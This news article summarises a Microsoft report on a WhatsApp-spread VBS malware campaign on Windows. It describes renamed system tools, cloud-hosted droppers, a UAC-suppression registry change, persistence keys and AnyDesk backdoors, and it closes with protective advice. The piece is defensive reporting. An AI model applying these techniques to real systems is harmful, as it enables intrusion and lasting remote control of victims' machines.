A new WhatsApp malware campaign is keeping Windows users on their toes: Microsoft has discovered a multi-stage attack chain in which cybercriminals send malicious scripts via the popular messenger – and ultimately gain remote access to the infected systems. Anyone using WhatsApp on the Windows desktop should now take a close look.
Attack via WhatsApp desktop: This is how the infection works
At the end of February 2026, the Microsoft Defender Security Research Team observed a campaign that delivers malicious VBS (Visual Basic Script) files to victims via WhatsApp messages. The attack is particularly insidious: it abuses the trust that users place in the well-known communication platform. Opening the file triggers a multi-stage infection chain.
Users of the WhatsApp desktop version under Windows are particularly at risk, as VBS files can be executed directly there without any detours – unlike on smartphones.
The four stages of the attack
Stage 1: Initial access via WhatsApp
As soon as the VBS script is executed, it creates hidden folders under C:ProgramData. Renamed versions of legitimate Windows tools are stored there – such as curl.exe as netapi.dll or bitsadmin.exe as sc.exe. This renaming is intended to trick security solutions. However, the actual PE metadata of the files (such as the OriginalFileName field) is retained, which is a detection feature for virus scanners.
Stage 2: Reloading further malware from the cloud
In the next step, the malware uses the renamed binary files to download additional droppers – such as auxs.vbs or WinUpdate_KB5034231.vbs. These are downloaded from well-known cloud services such as AWS S3, Tencent Cloud and Backblaze B2. The attackers deliberately use trustworthy cloud infrastructures so that the malicious data traffic looks like normal network traffic and is not blocked by protection programs.
Stage 3: Elevation of rights and persistence
The downloaded scripts interfere with Windows settings: The malware manipulates User Account Control (UAC) by modifying the registry entry ConsentPromptBehaviorAdmin. In this way, UAC queries are silently suppressed. In addition, it repeatedly launches cmd.exe with elevated rights and anchors itself via changes in the registry under HKLMSoftwareMicrosoftWin, so that the infection is retained even after a restart.
Stage 4: Installation of backdoors via MSI packages
In the last stage, unsigned MSI installers are downloaded – including file names such as Setup.msi, WinRAR.msi, LinkPoint.msi and AnyDesk.msi. These contain remote control software such as AnyDesk and give the attackers permanent remote access. They can use this to steal data, install further malware or misuse the compromised system as part of a botnet. In corporate environments, MSI installations are typically unnoticeable, which further improves stealth.
Who is behind it and who is affected?
Microsoft does not provide any specific details about the attackers or targeted victim groups. However, the analysis describes that the campaign relies on social engineering and so-called “living-off-the-land” techniques (LOLbins) – i.e. attacks that work exclusively with legitimate Windows on-board resources in order to bypass security solutions.
Basically, all Windows users with the WhatsApp desktop app installed should feel targeted. Particular caution should be exercised with messages from unknown senders that contain file attachments.
How to protect yourself – recommendations from Microsoft
Microsoft recommends the following protective measures, among others:
- Restrict script execution: Block execution of script hosts such as
wscript.exe,cscript.exeandmshtain insecure paths. - Monitor cloud traffic: Check traffic to services such as AWS S3, Tencent Cloud and Backblaze B2 for unusual downloads.
- Keep an eye on UAC changes: Evaluate registry entries under
HKLMSoftwareMicrosoftWinand manipulations of the UAC settings as a warning signal. - Keep Microsoft Defender up to date: According to Microsoft, Defender’s cloud-based protection detects the relevant malware (including as
Trojan:VBS/Obfuse.KPP!MTBandTrojan:VBS/BypassUAC.PAA!MTB). - Sensitize users: Employees should be made aware of suspicious attachments in messengers – attackers can also strike via WhatsApp.
Anyone using Microsoft Defender for Endpoint can also activate Attack Surface Reduction (ASR) rules to block the execution of VBScript and obfuscated scripts.
Not an isolated case: Messenger increasingly targeted
The campaign is part of a series of attacks that specifically use popular messenger platforms as a gateway. At the end of 2024, CISA warned of sophisticated social engineering attacks on Messenger users. Anyone who frequently receives messages from strangers – such as people in high-profile positions or in companies – should be particularly vigilant.
Find out more about security and WhatsApp at basic-tutorials.de: WhatsApp: Massive data leak on meta messenger | The best antivirus programs in comparison
Conclusion: Take WhatsApp malware seriously
The newly discovered WhatsApp malware campaign shows just how sophisticated modern attacks have become. Anyone working with WhatsApp Desktop on Windows should always ignore VBS file attachments – regardless of who they supposedly come from. Microsoft Defender and regular updates help to ward off such attacks. Microsoft has published the full technical analysis and Indicators of Compromise (IOCs) on its security blog.
